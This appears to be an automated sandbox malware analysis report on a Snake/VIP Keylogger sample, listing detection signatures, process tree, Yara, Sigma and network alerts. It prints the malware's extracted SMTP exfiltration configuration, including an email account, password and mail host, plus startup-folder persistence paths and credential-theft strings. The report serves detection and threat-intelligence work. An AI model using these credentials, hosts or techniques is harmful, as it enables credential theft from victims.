Edit tour

Windows Analysis Report
YJwE2gTm02.exe

Overview

General Information

Sample name:	YJwE2gTm02.exe renamed because original name is a hash value
Original sample name:	2e6f9a5fcfce60e9a28545dd9171993ed51d5e6ddb90643b9d3ea16f64c8a076.exe
Analysis ID:	1587875
MD5:	88ae8bda9d82167c30205b7be959d2b5
SHA1:	204d1aa6f9cfb662babba813bbbe54371c11d6b3
SHA256:	2e6f9a5fcfce60e9a28545dd9171993ed51d5e6ddb90643b9d3ea16f64c8a076
Tags:	exeMassLoggeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Drops VBS files to the startup folder

Found API chain indicative of sandbox detection

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected Generic Downloader

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

One or more processes crash

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

YJwE2gTm02.exe (PID: 1996 cmdline: "C:\Users\user\Desktop\YJwE2gTm02.exe" MD5: 88AE8BDA9D82167C30205B7BE959D2B5)

savagenesses.exe (PID: 2636 cmdline: "C:\Users\user\Desktop\YJwE2gTm02.exe" MD5: 88AE8BDA9D82167C30205B7BE959D2B5)

RegSvcs.exe (PID: 5000 cmdline: "C:\Users\user\Desktop\YJwE2gTm02.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

wscript.exe (PID: 7056 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\savagenesses.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

savagenesses.exe (PID: 3620 cmdline: "C:\Users\user\AppData\Local\toggeries\savagenesses.exe" MD5: 88AE8BDA9D82167C30205B7BE959D2B5)

RegSvcs.exe (PID: 5552 cmdline: "C:\Users\user\AppData\Local\toggeries\savagenesses.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

WerFault.exe (PID: 5276 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5552 -s 1492 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b27e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a921:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab7e:$a4: \Orbitum\User Data\Default\Login Data 0x3b55d:$a5: \Kometa\User Data\Default\Login Data
00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b27e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a921:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab7e:$a4: \Orbitum\User Data\Default\Login Data 0x3b55d:$a5: \Kometa\User Data\Default\Login Data
00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.4522071961.000000000334C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2daa0:$a1: get_encryptedPassword 0x2e028:$a2: get_encryptedUsername 0x2d713:$a3: get_timePasswordChanged 0x2d82a:$a4: get_passwordField 0x2dab6:$a5: set_encryptedPassword 0x307d2:$a6: get_passwords 0x30b66:$a7: get_logins 0x307be:$a8: GetOutlookPasswords 0x30177:$a9: StartKeylogger 0x30abf:$a10: KeyLoggerEventArgs 0x30217:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.4522071961.0000000003241000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000007.00000002.2558253285.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: savagenesses.exe PID: 2636	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: savagenesses.exe PID: 2636	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: savagenesses.exe PID: 2636	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: savagenesses.exe PID: 2636	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x53a1a6:$a1: get_encryptedPassword 0x53a724:$a2: get_encryptedUsername 0x539e28:$a3: get_timePasswordChanged 0x539f3f:$a4: get_passwordField 0x53a1bc:$a5: set_encryptedPassword 0x53ce80:$a6: get_passwords 0x53d210:$a7: get_logins 0x53ce6c:$a8: GetOutlookPasswords 0x53c825:$a9: StartKeylogger 0x53d169:$a10: KeyLoggerEventArgs 0x53c8c5:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 5000	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 5000	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: savagenesses.exe PID: 3620	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: savagenesses.exe PID: 3620	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: savagenesses.exe PID: 3620	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: savagenesses.exe PID: 3620	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x599e25:$a1: get_encryptedPassword 0x59a3a3:$a2: get_encryptedUsername 0x599aa7:$a3: get_timePasswordChanged 0x599bbe:$a4: get_passwordField 0x599e3b:$a5: set_encryptedPassword 0x59caff:$a6: get_passwords 0x59ce8f:$a7: get_logins 0x59caeb:$a8: GetOutlookPasswords 0x59c4a4:$a9: StartKeylogger 0x59cde8:$a10: KeyLoggerEventArgs 0x59c544:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 5552	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 5552	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 5552	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 5552	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13776:$a1: get_encryptedPassword 0x13cf4:$a2: get_encryptedUsername 0x133f8:$a3: get_timePasswordChanged 0x1350f:$a4: get_passwordField 0x1378c:$a5: set_encryptedPassword 0x16450:$a6: get_passwords 0x167e0:$a7: get_logins 0x1643c:$a8: GetOutlookPasswords 0x15df5:$a9: StartKeylogger 0x16739:$a10: KeyLoggerEventArgs 0x15e95:$a11: KeyLoggerEventArgsEventHandler
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.savagenesses.exe.f10000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.savagenesses.exe.f10000.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
5.2.savagenesses.exe.f10000.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
5.2.savagenesses.exe.f10000.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.savagenesses.exe.f10000.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
5.2.savagenesses.exe.f10000.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b27e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a921:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab7e:$a4: \Orbitum\User Data\Default\Login Data 0x3b55d:$a5: \Kometa\User Data\Default\Login Data
5.2.savagenesses.exe.f10000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
2.2.savagenesses.exe.990000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.savagenesses.exe.990000.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.savagenesses.exe.990000.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.savagenesses.exe.990000.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.savagenesses.exe.990000.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
2.2.savagenesses.exe.990000.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b27e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a921:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab7e:$a4: \Orbitum\User Data\Default\Login Data 0x3b55d:$a5: \Kometa\User Data\Default\Login Data
2.2.savagenesses.exe.990000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
7.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
7.2.RegSvcs.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b27e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a921:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab7e:$a4: \Orbitum\User Data\Default\Login Data 0x3b55d:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
5.2.savagenesses.exe.f10000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.savagenesses.exe.f10000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
5.2.savagenesses.exe.f10000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.savagenesses.exe.f10000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
5.2.savagenesses.exe.f10000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3947e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b21:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d7e:$a4: \Orbitum\User Data\Default\Login Data 0x3975d:$a5: \Kometa\User Data\Default\Login Data
5.2.savagenesses.exe.f10000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
2.2.savagenesses.exe.990000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.savagenesses.exe.990000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.savagenesses.exe.990000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.savagenesses.exe.990000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
2.2.savagenesses.exe.990000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3947e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b21:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d7e:$a4: \Orbitum\User Data\Default\Login Data 0x3975d:$a5: \Kometa\User Data\Default\Login Data
2.2.savagenesses.exe.990000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
Click to see the 28 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\savagenesses.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\savagenesses.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\savagenesses.vbs" , ProcessId: 7056, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\savagenesses.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\savagenesses.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\savagenesses.vbs" , ProcessId: 7056, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\toggeries\savagenesses.exe, ProcessId: 2636, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\savagenesses.vbs

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T18:55:20.823127+0100	2803305	3	Unknown Traffic	192.168.2.5	49706	104.21.112.1	443	TCP
2025-01-10T18:55:27.571605+0100	2803305	3	Unknown Traffic	192.168.2.5	49739	104.21.112.1	443	TCP
2025-01-10T18:55:29.044849+0100	2803305	3	Unknown Traffic	192.168.2.5	49748	104.21.112.1	443	TCP
2025-01-10T18:55:33.550358+0100	2803305	3	Unknown Traffic	192.168.2.5	49778	104.21.112.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T18:55:18.253825+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	193.122.6.168	80	TCP
2025-01-10T18:55:20.160088+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	193.122.6.168	80	TCP
2025-01-10T18:55:26.941329+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49711	193.122.6.168	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T18:55:42.311130+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49835	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
Source: 5.2.savagenesses.exe.f10000.0.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Virustotal: Detection: 44%			Perma Link

Multi AV Scanner detection for submitted file

Source: YJwE2gTm02.exe	Virustotal: Detection: 44%			Perma Link
Source: YJwE2gTm02.exe	ReversingLabs: Detection: 73%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: YJwE2gTm02.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: YJwE2gTm02.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49705 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49835 version: TLS 1.2

Source:	Binary string: $$.pdb source: RegSvcs.exe, 00000007.00000002.2557043101.0000000000B37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdbr source: RegSvcs.exe, 00000007.00000002.2557043101.0000000000B37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbSystem.Windows.Forms.dllSystem.Windows.Forms.dll source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\RegSvcs.pdbpdbvcs.pdb source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDB source: RegSvcs.exe, 00000007.00000002.2557043101.0000000000B37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: @"o.pdb source: RegSvcs.exe, 00000007.00000002.2557043101.0000000000B37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: savagenesses.exe, 00000002.00000003.2096617611.0000000003370000.00000004.00001000.00020000.00000000.sdmp, savagenesses.exe, 00000002.00000003.2102693456.0000000003510000.00000004.00001000.00020000.00000000.sdmp, savagenesses.exe, 00000005.00000003.2239905827.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, savagenesses.exe, 00000005.00000003.2242309038.0000000003A70000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp
